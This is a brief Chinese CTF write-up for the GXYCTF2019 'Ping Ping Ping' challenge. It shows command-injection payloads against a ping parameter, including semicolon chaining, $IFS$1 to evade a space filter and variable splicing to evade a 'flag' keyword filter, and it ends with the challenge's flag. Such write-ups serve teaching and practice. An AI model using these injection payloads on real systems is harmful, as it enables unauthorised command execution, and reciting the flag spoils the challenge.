首先尝试一下分号有没有被过滤:?ip=127.0.0.1;ls;
可以看见分号没有被过滤,看到了flag.php和index.php两个文件,先尝试能不能打开flag.php:?ip=127.0.0.1;cat flag.php;
能看出空格被过滤了,我们用$IFS$1绕过空格:?ip=127.0.0.1;cat$IFS$1flag.php;
可以看见flag也被过滤了,我们打开index.php看看:?ip=127.0.0.1;cat$IFS$1index.php;
发现可以利用变量a来绕过flag的过滤:?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
发现什么都没有,但没有失败提示,试试打开页面源码
成功获取flag:flag = "flag{3874c359-41b9-4f7e-bdfa-c25ee4bae813}
标签:127.0,0.1,ip,Ping,CTF,flag,php,GXYCTF2019 From: https://www.cnblogs.com/Evan66/p/18076024